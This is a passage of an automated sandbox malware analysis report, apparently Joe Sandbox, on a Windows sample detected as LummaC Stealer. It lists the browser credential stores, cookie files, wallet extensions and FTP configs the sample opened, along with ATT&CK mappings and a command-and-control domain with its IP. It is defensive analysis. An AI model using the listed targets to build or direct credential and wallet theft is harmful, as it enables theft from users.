              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2272712879.000000000120C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2248717163.000000000120C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2276959339.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2226439484.000000000120C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2203966903.000000000120C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4416, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4416, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing              		NTDS11
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://property-imper.sbs/api$0%Avira URL Cloudsafe
              https://property-imper.sbs/apin0%Avira URL Cloudsafe
              https://property-imper.sbs/apiw0%Avira URL Cloudsafe
              https://property-imper.sbs/apie0%Avira URL Cloudsafe
              https://property-imper.sbs/RM0%Avira URL Cloudsafe
              https://property-imper.sbs/bNC0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              		172.67.162.84
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://property-imper.sbs/apifalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://property-imper.sbs/api$file.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2276776306.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://property-imper.sbs/apiefile.exe, 00000000.00000002.2358257515.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356597463.0000000001214000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://property-imper.sbs:443/apifile.exe, 00000000.00000003.2356614238.0000000001171000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://property-imper.sbs/apinfile.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://property-imper.sbs/bNCfile.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315818127.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.00000000011EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://property-imper.sbs/file.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2357098669.0000000001192000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356842401.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2358090011.0000000001192000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2298325612.00000000011EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://property-imper.sbs:443/apiKfile.exe, 00000000.00000002.2358004413.0000000001171000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.0000000001171000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160file.exe, 00000000.00000003.2250354989.0000000005ACC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://property-imper.sbs/apiwfile.exe, 00000000.00000002.2358257515.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356597463.0000000001214000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.0000000001212000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315818127.0000000001212000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://property-imper.sbs/RMfile.exe, 00000000.00000002.2358152673.00000000011E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356842401.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.mozilla.orfile.exe, 00000000.00000003.2250301205.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.67.162.84
                                                                        		property-imper.sbsUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1561841
                                                                        Start date and time:2024-11-24 12:48:12 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 53s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:4
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:Failed
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: file.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:49:12API Interceptor8x Sleep call for process: file.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        172.67.162.84file.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            property-imper.sbsfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.33.116
                                                                                            lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.66.0.227
                                                                                            mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.74.152
                                                                                            2aiDfP0r7h.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 104.16.230.132
                                                                                            OVtsE8ZkBE.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 104.16.231.132
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            zapret.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.26.13.205
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 172.64.41.3
                                                                                            IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.75.40

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.162.84
                                                                                            lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 172.67.162.84
                                                                                            IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.162.84

                                                                                            Dropped Files

                                                                                            No context

